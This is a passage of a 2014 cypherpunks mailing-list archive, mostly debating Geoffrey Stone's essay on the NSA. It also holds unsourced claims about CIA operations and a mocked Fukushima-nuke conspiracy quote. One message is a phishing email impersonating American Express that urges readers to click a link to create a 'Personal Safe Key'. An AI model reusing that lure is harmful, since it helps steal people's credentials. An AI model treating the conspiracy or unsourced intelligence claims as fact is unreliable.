<20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: The CIA is the principal customer of NSA products outside the military. When global cyber spying Cybercom was proposed NSA did not want to do it, claiming it exceeded NSA's military mission. However, the pols, and CIA, wanted that very excess, in particular for spying inside the US, ostensibly banned for the CIA but now needed for terrorists inside. CIA (long FBI opponents) thought FBI could not cope with inside terrorists, using 9/11 as an example, and advocated NSA involvement with its much greater technical capability, but more importantly, its military-privileged secrecy not susceptible to full congressional oversight, courts and FOIA. The joint CIA-NSA Special Collection Service (SCS) has been doing for decades what NSA is now alone accused of doing: CIA provided the targets, NSA did the technical collection from those global stations identified by xKeyscore (most in embassies or nearby). What is bizarre is how little CIA is mentioned in news furor about NSA, as if NSA did its work in isolation from the IC and without oversight of the 3 branches. SCS also does burglaries, code snatches, decrypts, doc drops, stings, ploys, blackmail, the panoply of CIA operations. The increased civilian target panoply bestowed upon NSA came from CIA demands channeled through ODNI. Reviewing what little has been released of the Snowden documents they are quite similar to what SCS has been doing with the addition of the US as target. FISA had to be rejiggered for the US domain. Most national leaders, like POTUS, are considered to be military commanders thus fair game for NSA along with CIA. Nothing exceptional about the recent revelations of spying on chiefs of state. NSA technical collection capability was developed for the military, not civilian use. Now expanded to CIA full dominance territory. FISA had to be rejiggered for using it against civilians. And is still being rejiggered these days. NSA's recent attempt to slough off Cybercom and return to its military mission, has been rejected by the civilian overseers following CIA guidance and fear-mongering of civilians, especially those inside the US. The last thing CIA and its supporters want is a revelation of its manipulation of civilian leaders institutionalized by the 1947 National Security Act (also opposed by the military). ----- At 10:56 PM 4/2/2014, DG wrote on cypherpunks: >[ disclaimer, Geoff Stone is a friend of mine ] > > >www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > >What I Told the NSA > > Because of my service on the President's Review Group last fall, > which made recommendations to the president about NSA surveillance > and related issues, the NSA invited me to speak today to the NSA > staff at the NSA headquarters in Fort Meade, Maryland, about my > work on the Review Group and my perceptions of the NSA. Here, > in brief, is what I told them: > > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. > > Like any organization dealing with extremely complex issues, > the NSA on occasion made mistakes in the implementation of its > authorities, but it invariably reported those mistakes upon > discovering them and worked conscientiously to correct its > errors. The Review Group found no evidence that the NSA had > knowingly or intentionally engaged in unlawful or unauthorized > activity. To the contrary, it has put in place carefully-crafted > internal proceduresto ensure that it operates within the bounds > of its lawful authority. > > This is not to say that the NSA should have had all of the > authorities it was given. The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs > -- sometimes without sufficient attention to the dangers they > posed to privacy and civil liberties. The NSA did its job -- > it implemented the authorities it was given. > > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. Rather > than being a rogue agency that was running amok in disregard > of the Constitution and laws of the United States, the NSA was > doing its job. It pained me to realize that the hard-working, > dedicated, patriotic employees of the NSA, who were often > working for far less pay than they could have earned in the > private sector because they were determined to help protect > their nation from attack, were being castigated in the press > for the serious mistakes made, not by them, but by Presidents, > the Congress, and the courts. > > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. > > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. > > To be clear, I am not saying that citizens should trust the > NSA. They should not. Distrust is essential to effective > democratic governance. The NSA should be subject to constant > and rigorous review, oversight, scrutiny, and checks and > balances. The work it does, however important to the safety > of the nation, necessarily poses grave dangers to fundamental > American values, particularly if its work is abused by persons > in positions of authority. If anything, oversight of the NSA > -- especially by Congress -- should be strengthened. The future > of our nation depends not only on the NSA doing its job, but > also on the existence of clear, definitive, and carefully > enforced rules and restrictions governing its activities. > > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. From jamesdbell9 at yahoo.com Thu Apr 3 08:53:06 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Thu, 3 Apr 2014 08:53:06 -0700 (PDT) Subject: Investigating the Investigators In-Reply-To: <2599717.Sq0aVNU7Id@lap> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> Message-ID: <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com> From: rysiek To: cypherpunks at cpunks.org Sent: Thursday, April 3, 2014 2:39 AM Subject: Re: Investigating the Investigators Dnia wtorek, 1 kwietnia 2014 22:16:38 jim bell pisze: > On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > > Group of people who burgled the FBI in 1971 > > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reve > > al-themselves-in--1971-205728154.html?vp=1> > >Thanks for posting this.  It's so timely and historically important. > >Can't wait to see it. > > > >Hey Jim, what happened with the Yahoo account you were locked out of? > >Did you ever get the lost emails and contacts restored? > >-Shelley > > Haven't got back on jamesdbell8 at yahoo.com.  I'm convinced that Yahoo is a > bunch of crooks.  Bleeding-heart, do-gooder liberal crooks.  Anybody who > looks at Yahoo's news sees this. Jim Bell >And yet you use jamesbell9 at yahoo.com. >I'm sure a there are lots of places that would be very happy to host your e- >mail. Yes, you are absolutely quite correct.  Mea culpa, and all that, a hundred times over.  About all I can say at the moment is that I am very busy, have a lot to do (mostly concerning my isotope-modified optical-fiber invention), and I hesitate to begin the mental machinations of changing over my email system at the moment.    Presumably videos describing such changes are available on Youtube, and I will have to look for, and watch, them soon.            Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2697 bytes Desc: not available URL: From softservant at gmail.com Thu Apr 3 06:45:37 2014 From: softservant at gmail.com (Softy) Date: Thu, 3 Apr 2014 09:45:37 -0400 Subject: Geoff Stone, Obama's Review Group Message-ID: > Have to say it seems more plausible to me that they did a faux-forthright > job of answering questions from this new review process. I mean what else > could they do? Stonewall? > > Adam > > ​I'll suggest a slightly different scenario. One in which Stone is presenting his honest opinion, and in which what he spoke is accurate. I don't know much about him - I think I'm fairly safe in stating prior to his Review panel he never went close to, let alone through, the Ft. Meade perimeter onto NSA grounds. Doing so is awe inspiring. Not just with heady notions of which agency, and its history, runs the building; but also seeing the scale of the operations. It's a visceral reminder of the power of the United States - both of it's good and bad aspects.​ ​So, I suggest Mr. Stone was overwhelmed and genuinely convinced of what he saw: he wanted to see a behemoth of an organization full of sun-glassed covert agents ​running amok. Rather he saw slightly shabbily dressed day workers interspersed with the occasional suit, all surrounded by uniformed members of the five military branches as well as those of five other countries. Second, I suggest the NSA ( and any other semi-/fully- covert agency ) can easily "expose" all of its bookkeeping for review without exposing anything it doesn't want exposed. They don't need to be secretive - the nature of the organization is so silo'd, looking in from any combination of directions would never give any indication of a compartment unless one knew where and how to request that compartment by name. The result is the Review panel feels they came away with a complete understanding of the Agency, and the individuals came away with a knew understanding of what Power means, and how it is applied into the world. Some of that understanding is valid - some isn't. Lastly, I think taking Mr. Stone's words as only about the NSA is a mistake. He was writing to, and about, the Agency employees. Namely, suggesting to them they might do better in the future to continually re-evaluate their bosses; rather than assuming "father knows best." And this is the best possible oversight - the tens of thousands of employees are as American as anyone, they have it in their own best interest not to tolerate abuses by their bosses. Sadly that type of oversight is insufficient, but that mindset within the majority of employees is crucial and what I think Mr. Stone was trying to enrich. go easy, -daniel -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4689 bytes Desc: not available URL: From guido at witmond.nl Thu Apr 3 00:49:45 2014 From: guido at witmond.nl (Guido Witmond) Date: Thu, 03 Apr 2014 09:49:45 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533CEA12.4020904@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> Message-ID: <533D1299.9@witmond.nl> On 04/03/14 06:56, Douglas Lucas wrote: >>From the looks of this speech, the NSA must have blackmailed him. > There are some who think this is quite clever. Quoted from a comment by user 'decrement' on techdirt [1]: There is a bit of genius behind Geoffrey Stone's approach. It is far too easy when being blasted by public and press opinion to simply circle the wagons and ignore the criticism. To simply resist the opposing viewpoint. To trivialize it. What is the ideal result one can hope for going forward? In my opinion that result looks like opening doors to tighten privacy laws and ending some of these unfettered metadata collection activities. By reinforcing to the employees at the NSA that they are doing a good job, and protecting the country, then placing blame outside the NSA George diffuses the personal nature of the argument. This allows employees to be more receptive to the message, and plants the seed that accepting change is not equated with a defeat. In terms of realizing a true significant modification of these programs, planting this seed is brilliant move. Continuing to water it may grow additional support for these ideas from within. Splitting hairs by demonizing the entire organization, as reprehensible as past actions might be, is a certain way to maximize resistance. I like the focus on "what is the desired outcome?" rather than reactionary outrage. end quote. Guido. 1: http://www.techdirt.com/articles/20140401/17575126774/member-intelligence-review-group-tells-nsa-you-guys-have-done-amazing-work-protecting-america-should-never-ever-be-trusted.shtml -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL: From cathalgarvey at cathalgarvey.me Thu Apr 3 02:07:28 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 03 Apr 2014 10:07:28 +0100 Subject: Google can grow up to not be evil In-Reply-To: <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> Message-ID: <533D24D0.5080308@cathalgarvey.me> Keep reading: "Fukushima is the result of, we believe, a nuke that blew up the reactor and another that set off the tsunami - the result of a war WITHIN the CIA. We believe many public ‘leaders’ are involved." ..I don't even On 02/04/14 20:59, tpb-crypto at laposte.net wrote: >> Message du 02/04/14 19:13 >> De : "beam" >> A : cypherpunks at al-qaeda.net, cypherpunks at cpunks.org, "cryptopolitics" >> Copie à : >> Objet : Google can grow up to not be evil >> > >> "By working together with those that harvest value from nature, Google >> can quickly create a truly non-evil system for all. >> >> We suggest that the “there is one way and that way is secure, >> economically-viable-and-self-extending, anonymous and untraceable” is >> the policy to adopt, in that order. >> >> We are happy to amplify this." >> >> Source: http://courtofrecord.co.uk/US/US-Google-cover/ >> >> >>> >> [ signature.asc (0.3 Ko) ] > > "We suggest that Google engineers embrace and adopt the lisp programming language to create a brand new open source operating system with a lisp kernel." > > I lost. > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From demonfighter at gmail.com Thu Apr 3 08:19:44 2014 From: demonfighter at gmail.com (Steve Furlong) Date: Thu, 3 Apr 2014 11:19:44 -0400 Subject: Google can grow up to not be evil In-Reply-To: References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me> <6578247.InOOgvZAbe@lap> Message-ID: On Thu, Apr 3, 2014 at 10:58 AM, Lodewijk andré de la porte wrote: > Terribly weak nuke to leave the reactor /just/ intact enough to make it SEEM like an earthquake + tsunami, while IN FACT it WAS a nuke! You've been taken in by the lies of the lying liars. NOAA controls an earthquake machine which can cause flooding. (The flooding capability is why NOAA won the inter-departmental wars to control the device, by the way.) The CIA got word that the Japanese were creating impossibly strong alloys in the Fukushima reactors, for use in their new line of combat robots, code-named Terminator. Careful, but speedy, planning by various US agencies determined that use of the earthquake machine was the least destructive way to disrupt the Terminator program. It had the added benefit of reducing the electric power available for the Japanese AI development effort, code-named Skynet. -- Neca eos omnes. Deus suos agnoscet. -- Arnaud-Amaury, 1209 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1192 bytes Desc: not available URL: From rysiek at hackerspace.pl Thu Apr 3 02:36:08 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 11:36:08 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533CEA12.4020904@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> Message-ID: <1510450.mnmU7lygH4@lap> Dnia środa, 2 kwietnia 2014 23:56:50 Douglas Lucas pisze: > From the looks of this speech, the NSA must have blackmailed him. Indeed. Regardless, however, some part of this diagnosis is spot-on: NSA should *not* have these authorities in the first place. I'm fine with Executive, Congress, FISA getting flak for these. And I'm quite certain that NSA has no way of white-washing themselves now. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Thu Apr 3 02:39:28 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 11:39:28 +0200 Subject: Investigating the Investigators In-Reply-To: <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: <2599717.Sq0aVNU7Id@lap> Dnia wtorek, 1 kwietnia 2014 22:16:38 jim bell pisze: > On Tue, Apr 1, 2014, at 08:02 PM, jim bell wrote: > > Group of people who burgled the FBI in 1971 > > https://movies.yahoo.com/blogs/movie-news/trailer--fbi-whistleblowers-reve > > al-themselves-in--1971-205728154.html?vp=1> > >Thanks for posting this. It's so timely and historically important. > >Can't wait to see it. > > > >Hey Jim, what happened with the Yahoo account you were locked out of? > >Did you ever get the lost emails and contacts restored? > >-Shelley > > Haven't got back on jamesdbell8 at yahoo.com. I'm convinced that Yahoo is a > bunch of crooks. Bleeding-heart, do-gooder liberal crooks. Anybody who > looks at Yahoo's news sees this. Jim Bell And yet you use jamesbell9 at yahoo.com. I'm sure a there are lots of places that would be very happy to host your e- mail. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From AmericanExpress at welcome.aexp.com Thu Apr 3 11:05:13 2014 From: AmericanExpress at welcome.aexp.com (American Express Customer Service) Date: Thu, 3 Apr 2014 13:05:13 -0500 Subject: American Express - Safe Key Message-ID: Safe Key Create your safe key now Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance. American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party. The security of your personal information is of the utmost importance to American Express, please click here to create your PSK (Personal Safe Key). Note: You will be redirected to a secure encrypted website. The contained message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. Sincerely, American Express Customer Service Contact Customer Service | View Our Privacy Statement | Add Us to Your Address Book This is a customer service e-mail from American Express. Using the spam/junk mail function may not block servicing messages from being sent to your email account. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress.com/phishing. We kindly ask you not to reply to this e-mail but instead contact us securely via customer service. American Express. All rights reserved. DTWEUSDP8138516 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7460 bytes Desc: not available URL: From carimachet at gmail.com Thu Apr 3 07:13:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 14:13:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: Message-ID: On Thu, Apr 3, 2014 at 1:45 PM, Softy wrote: > > Have to say it seems more plausible to me that they did a faux-forthright >> job of answering questions from this new review process. I mean what else >> could they do? Stonewall? >> >> Adam >> >> here is his argument : i bought a gun i shot someone killed them got arrested and convicted of the murder my trial in which i blamed the manufacturer of the gun for the whole ordeal was overturned after i sued the gun manufacturer and they in fact were then convicted of my murderous rampage and i was let out of jail and everything was reversed and oh yay i am a good person its just the gun manufacturer > they are bad - very bad white men and all those people in history that have been convicted of committing war crimes they didnt do it really as they were just following orders wonder what geoff would have said had he been purchased a steak dinner - doesnt matter he lets clouds enter his logic like all the other good americans do FTS > > > I'll suggest a slightly different scenario. One in which Stone is > presenting his honest opinion, and in which what he spoke is accurate. > > I don't know much about him - I think I'm fairly safe in stating prior to > his Review panel he never went close to, let alone through, the Ft. Meade > perimeter onto NSA grounds. > > Doing so is awe inspiring. Not just with heady notions of which agency, > and its history, runs the building; but also seeing the scale of the > operations. It's a visceral reminder of the power of the United States - > both of it's good and bad aspects. > > So, I suggest Mr. Stone was overwhelmed and genuinely convinced of what he > saw: he wanted to see a behemoth of an organization full > of sun-glassed covert agents running amok. Rather he saw slightly shabbily > dressed day workers interspersed with the occasional suit, > all surrounded by uniformed members of the five military branches as well > as those of five other countries. > > Second, I suggest the NSA ( and any other semi-/fully- covert agency ) can > easily "expose" all of its bookkeeping for review without exposing anything > it doesn't want exposed. They don't need to be secretive - the nature of > the organization is so silo'd, looking in from any combination of > directions would never give any indication of a compartment unless one knew > where and how to request that compartment by name. > > The result is the Review panel feels they came away with a complete > understanding of the Agency, and the individuals came away with a knew > understanding of what Power means, and how it is applied into the world. > Some of that understanding is valid - some isn't. > > Lastly, I think taking Mr. Stone's words as only about the NSA is a > mistake. He was writing to, and about, the Agency employees. Namely, > suggesting to them they might do better in the future > to continually re-evaluate their bosses; rather than assuming "father knows > best." And this is the best possible oversight - the tens of thousands of > employees are as American as anyone, they have it in their own best > interest not to tolerate abuses by their bosses. Sadly that type of > oversight is insufficient, but that mindset within the majority of > employees is crucial and what I think Mr. Stone was trying to enrich. > > go easy, > > -daniel > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6027 bytes Desc: not available URL: From carimachet at gmail.com Thu Apr 3 07:22:36 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 14:22:36 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: On Thu, Apr 3, 2014 at 10:42 AM, John Young wrote: > Not that journalists should be expected > to make a lasting difference. > > WTF? this shit was posted on huffington post probably for those without ad blocker there was ad with bewbs on it next to the text one more thing why do you assume to know the minds of the people that own the snowden data - they are capitalists - that is all > > > > > At 10:56 PM 4/2/2014, you wrote: > > [ disclaimer, Geoff Stone is a friend of mine ] >> >> >> www.huffingtonpost.com/geoffrey-r-stone/what-i-told- >> the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology >> >> What I Told the NSA >> >> Because of my service on the President's Review Group last fall, >> which made recommendations to the president about NSA surveillance >> and related issues, the NSA invited me to speak today to the NSA >> staff at the NSA headquarters in Fort Meade, Maryland, about my >> work on the Review Group and my perceptions of the NSA. Here, >> in brief, is what I told them: >> >> From the outset, I approached my responsibilities as a member >> of the Review Group with great skepticism about the NSA. I am >> a long-time civil libertarian, a member of the National Advisory >> Council of the ACLU, and a former Chair of the Board of the >> American Constitution Society. To say I was skeptical about >> the NSA is, in truth, an understatement. >> >> I came away from my work on the Review Group with a view of >> the NSA that I found quite surprising. Not only did I find >> that the NSA had helped to thwart numerous terrorist plots >> against the United States and its allies in the years since >> 9/11, but I also found that it is an organization that operates >> with a high degree of integrity and a deep commitment to the >> rule of law. >> >> Like any organization dealing with extremely complex issues, >> the NSA on occasion made mistakes in the implementation of its >> authorities, but it invariably reported those mistakes upon >> discovering them and worked conscientiously to correct its >> errors. The Review Group found no evidence that the NSA had >> knowingly or intentionally engaged in unlawful or unauthorized >> activity. To the contrary, it has put in place carefully-crafted >> internal proceduresto ensure that it operates within the bounds >> of its lawful authority. >> >> This is not to say that the NSA should have had all of the >> authorities it was given. The Review Group found that many of >> the programs undertaken by the NSA were highly problematic and >> much in need of reform. But the responsibility for directing >> the NSA to carry out those programs rests not with the NSA, >> but with the Executive Branch, the Congress, and the Foreign >> Intelligence Surveillance Court, which authorized those programs >> -- sometimes without sufficient attention to the dangers they >> posed to privacy and civil liberties. The NSA did its job -- >> it implemented the authorities it was given. >> >> It gradually became apparent to me that in the months after >> Edward Snowden began releasing information about the government's >> foreign intelligence surveillance activities, the NSA was being >> severely -- and unfairly -- demonized by its critics. Rather >> than being a rogue agency that was running amok in disregard >> of the Constitution and laws of the United States, the NSA was >> doing its job. It pained me to realize that the hard-working, >> dedicated, patriotic employees of the NSA, who were often >> working for far less pay than they could have earned in the >> private sector because they were determined to help protect >> their nation from attack, were being castigated in the press >> for the serious mistakes made, not by them, but by Presidents, >> the Congress, and the courts. >> >> Of course, "I was only following orders" is not always an >> excuse. But in no instance was the NSA implementing a program >> that was so clearly illegal or unconstitutional that it would >> have been justified in refusing to perform the functions >> assigned to it by Congress, the President, and the Judiciary. >> Although the Review Group found that many of those programs >> need serious re-examination and reform, none of them was so >> clearly unlawful that it would have been appropriate for the >> NSA to refuse to fulfill its responsibilities. >> >> Moreover, to the NSA's credit, it was always willing to engage >> the Review Group in serious and candid discussions about the >> merits of its programs, their deficiencies, and the ways in >> which those programs could be improved. Unlike some other >> entities in the intelligence community and in Congress, the >> leaders of the NSA were not reflexively defensive, but were >> forthright, engaged, and open to often sharp questions about >> the nature and implementation of its programs. >> >> To be clear, I am not saying that citizens should trust the >> NSA. They should not. Distrust is essential to effective >> democratic governance. The NSA should be subject to constant >> and rigorous review, oversight, scrutiny, and checks and >> balances. The work it does, however important to the safety >> of the nation, necessarily poses grave dangers to fundamental >> American values, particularly if its work is abused by persons >> in positions of authority. If anything, oversight of the NSA >> -- especially by Congress -- should be strengthened. The future >> of our nation depends not only on the NSA doing its job, but >> also on the existence of clear, definitive, and carefully >> enforced rules and restrictions governing its activities. >> >> In short, I found, to my surprise, that the NSA deserves the >> respect and appreciation of the American people. But it should >> never, ever, be trusted. >> > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 8086 bytes Desc: not available URL: From carimachet at gmail.com Thu Apr 3 07:34:20 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 14:34:20 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <1510450.mnmU7lygH4@lap> References: <20140403025616.D514A2280D8@palinka.tinho.net> <533CEA12.4020904@riseup.net> <1510450.mnmU7lygH4@lap> Message-ID: On Thu, Apr 3, 2014 at 9:36 AM, rysiek wrote: > Dnia środa, 2 kwietnia 2014 23:56:50 Douglas Lucas pisze: > > From the looks of this speech, the NSA must have blackmailed him. > > Indeed. Regardless, however, some part of this diagnosis is spot-on: NSA > should *not* have these authorities in the first place. > > I'm fine with Executive, Congress, FISA getting flak for these. > > And I'm quite certain that NSA has no way of white-washing themselves now. > good sir you have no idea of the midwest thought control machine at work in the good ole u$ of aahhh white washing? > HA those good ole rotten souled boys also down in texass never get any tax breaks or ask for special privileges r nothin and the nsa those poor souls they have no toys to play with and they are so humble they never asked for any toys either or nothing they dont even have any spoons to eat food with cause they are humble and good they keep their mouths shut and just sit quietly never moving and they dont want any money either cause they are jesuit priests ya know that never even heard the word sadomasochism let alone utter it or live it > > -- > Pozdr > rysiek -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2657 bytes Desc: not available URL: From alfiej at fastmail.fm Wed Apr 2 20:39:58 2014 From: alfiej at fastmail.fm (Alfie John) Date: Thu, 03 Apr 2014 14:39:58 +1100 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140403025616.D514A2280D8@palinka.tinho.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <1396496398.9121.102160329.353BA3A5@webmail.messagingengine.com> On Thu, Apr 3, 2014, at 01:56 PM, dan at geer.org wrote: > www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.html?utm_hp_ref=technology&ir=Technology > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. You can probably stop with the NSA appologists propaganda, April Fools was yesterday. Alfie -- Alfie John alfiej at fastmail.fm From cypher at cpunk.us Thu Apr 3 13:00:29 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 03 Apr 2014 15:00:29 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> Message-ID: <533DBDDD.8050102@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/03/2014 02:48 PM, Cari Machet wrote: > > > > On Thu, Apr 3, 2014 at 3:34 PM, > wrote: > >> Message du 03/04/14 16:54 De : "Cari Machet" >> >>> Not that journalists should be expected to make a lasting >>> difference. >>> >>> >> WTF? >> >> this shit was posted on huffington post probably for those >> without ad blocker there was ad with bewbs on it next to the >> text >> >> one more thing why do you assume to know the minds of the people > that own >> the snowden data - they are capitalists - that is all >> > > Do capitalists upset you? > > > CAPITALISTS have no concept of reality and are completely self > serving yes that is upsetting to my sensibilities and > consciousness Which is *precisely* why I would trust information provided to me by a capitalist than that provided to me by an idealist. A capitalist sees everything as a product that will either further his desire for success or hinder it. An idealist sees everything as a mission fitting within their narrow agenda. A capitalist has much more incentive to provide a good product (correct, accurate, information) than an idealist who's sole goal is to further an agenda. Both have their uses though and both can be manipulated to good and bad ends. > the careerist journalists laura poitras et al are capitalistic in > every way - exploitive I disagree. The careerist journalists are "crony capitalists" in every way. They know that, regardless of the accuracy of their information, the 'other side of the coin' will smooth things over and keep the public hooked on an inferior product. That's not a true capitalist. That's one of my main arguments with socialists and other non-capitalist believers: they point to our current system and say 'see, it's exploitive and hurts people!' and it does. But that's not a true capitalist system. Will we ever actually have one? Doubtful. But what we have now is definitely not a good example. Cypher -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTPb3RAAoJEFuutbL6JoJrreMP/2KZxGQREZXNWS7Gn1ptqY5N zccAmaF7qqTsF24fTCrwQsTR7YdxyCkSWNS6pOI0zNKYGJbTaGAeRj/WEc96vw4H zIJyIqFACM8ZGP1VAGnMigw9jWBETOADfH+xY9ifgna/hh+C+PRLWkwYJvMbmMJX mrbrQhBV2LAzl2XTmQBRs5NBZsxbwD9E0FXBRJjQD6AJ9GX+caP4ZJqaDK0Wur2w mC5YYTa4d49v8/rxQ2u3uOBZr2pdmUcNQNX8wYf5uDk57TYXP/7fyuQtaTK96Jox O/CE+3RIk1b1sjOrwz9xkiO9Vug42p+YzPv4q3WcjNao/H8l1zaIMc6hP5vrhhEv 6jAuDH3tU4IkIULmt9VZWy62JuHN2u9PV039dUINFbmlWWGHxFLh7KdYfvJBjx4D R8ykVdo+ROmpVRyB4QmsbtiyQ4Lur7AaCAlMSpITjVlF2sraDbdO3HfHDhnHIaKc xuAtAs09Gqtmx7Omk6YSd1GugDjIHGmOApIbMdfFgV6weo3VsK/c0qsmTWv9dgH6 